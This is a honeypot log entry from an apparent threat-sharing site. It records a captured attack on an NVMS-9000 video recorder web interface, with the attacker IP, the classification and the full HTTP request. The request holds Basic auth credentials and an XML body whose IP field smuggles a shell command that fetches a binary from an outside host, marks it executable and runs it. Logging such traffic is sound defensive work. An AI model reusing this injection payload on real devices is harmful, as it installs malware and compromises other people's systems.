Time | 2022/06/14, 14:11:41 (GMT) |
Transaction ID | LQOLY757L1HXZBKE |
Service | http |
Location | CN (China) |
Attacker | 120.6.158.105 |
Classification | Web structure control |
Harm Potential | Medium |
POST /editBlackAndWhiteList HTTP/1.1 Accept-Encoding: identity Content-Length: 644 Accept-Language: en-us Host: 46.4.222.114:80 Accept: */* User-Agent: Mozila/5.0 Connection: close Cache-Control: max-age=0 Content-Type: text/xml Authorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0= <?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(cd${IFS}/tmp;wget${IFS}http://92.118.230.134/garm7${IFS}-O-${IFS}>GSec;chmod${IFS}777${IFS}GSec;./GSec${IFS}tvt)</ip></item></filterList></content></request>
All details are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |